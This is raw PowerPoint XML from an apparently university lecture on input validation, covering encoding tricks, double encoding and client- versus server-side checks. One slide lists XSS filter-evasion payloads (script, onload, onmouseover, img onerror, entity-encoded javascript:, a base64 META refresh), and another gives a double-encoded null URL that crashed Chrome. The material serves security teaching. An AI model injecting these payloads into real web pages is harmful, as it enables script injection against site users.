              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> or sub-strings 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nl-NL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+redundantstring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@bla.com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nl-NL" sz="1600" b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me@gmail.com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chooses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ignore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dots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usernames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nl-NL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nl-NL" sz="16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Anything</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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name@bla.com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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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sz="16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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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16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silly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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16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comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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)@</a:t>
            </a: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bla.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" b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  .  ~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>names</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr 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file://127.0.0.1/c|WINDOWS/clock.avi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>either</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-N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nl-NL" sz="1800" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-N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nl-NL" sz="1800" dirty="0"/>
              <a:t> in a URL on Windows  </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="18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nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>URL  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>                        eg  </a:t>
            </a:r>
            <a:r>
              <a:rPr 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nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> as  </a:t>
            </a:r>
            <a:r>
              <a:rPr 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%2f </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>                 eg  </a:t>
            </a:r>
            <a:r>
              <a:rPr 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nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> as  </a:t>
            </a:r>
            <a:r>
              <a:rPr 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nl-NL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u002f</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" b="1" dirty="0" smtClean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nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>ignored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>trailing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr 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l-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  in a domain name, eg  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-N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www.ru.nl</a:t>
            </a:r>
            <a:r>
              <a:rPr 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l-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1050" dirty="0" smtClean="0"/>
              <a:t>. . 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3363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400" dirty="0" err="1" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Complications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="2400" dirty="0" smtClean="0"/>
              <a:t> in input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>validation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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="2400" dirty="0" smtClean="0"/>
              <a:t> XSS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Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Many places </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>to include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>many ways to encode it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, make input validation hard! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1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alt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&lt;script language="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" alt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"&gt; alert('Hi');&lt;/script&gt;          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>can also be written as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" alt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&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1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onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" alt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=alert('Hi')&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" alt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&lt;b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1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onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" alt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=alert('Hi')&gt;Click here!&lt;/b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" alt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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1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altLang="nl-NL" sz="1800" b="1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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" alt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="http://some.url.that/does/not/exist"   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1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onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" alt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=alert('Hi');&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" alt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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" alt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altLang="nl-NL" sz="1800" b="1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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" alt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=j&amp;#X41vascript:alert('Hi')&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" alt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&lt;META HTTP-EQUIV="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>refresh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" alt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"   CONTENT="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0;url=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data:text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" alt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"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="339933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Font typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" smtClean="0"/>
              <a:t>For a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>longer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>lists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" smtClean="0"/>
              <a:t> of tricks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" smtClean="0"/>
              <a:t> https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1600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6029425-025F-4708-82DA-B9968B98C5E5}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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6623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smtClean="0"/>
              <a:t>Double </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>encoding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problems</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Double encoding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>may let attackers to by-pass input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="18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namely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="18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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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input validation only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="18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decodes once, but an interface deeper in the application performs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="18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second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>decoding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GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>For example, Chrome </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>crashed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>on the URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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://%%30%30</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB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%30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>URL-encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> of the character </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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8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1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="006600"/>
              </a:solidFill>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>So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%%30%30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is the URL-encoding of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is the URL-encoding of  null character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>So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%%30%30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>double-encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>pparently some code deep inside Chrome does a second decoding (as a well-intended ‘service’ to its client code?) and then some other code chokes on the null character </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean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altLang="en-US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altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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4F53E5E-B0FE-41B6-BDEC-A3A13A933BF8}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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3286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validation disasters waiting to happen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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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187712" y="5274042"/>
            <a:ext cx="670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Here the user is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800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expected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1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 to supply HTML…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1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Validating &amp; sanitising such a rich input language is tricky!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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24" b="18072"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187912" y="1060836"/>
            <a:ext cx="6564700" cy="4182441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Rechte verbindingslijn met pijl 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1907704" y="4366026"/>
            <a:ext cx="504056" cy="7920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689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u="sng" dirty="0" smtClean="0"/>
              <a:t>Where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>  to validate or sanitise?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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3248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Client- vs Server-side validation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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>alidation can be done </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client-side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Eg, for web, in the web-browser or the web-server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0"/>
              <a:t>Which is best?  Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>both</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0"/>
              <a:t> even make sense?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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Think about your attacker model! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Typically, security-critical checks must be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>done</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> server-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>lient-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>checks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>assume</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>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client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validation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i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
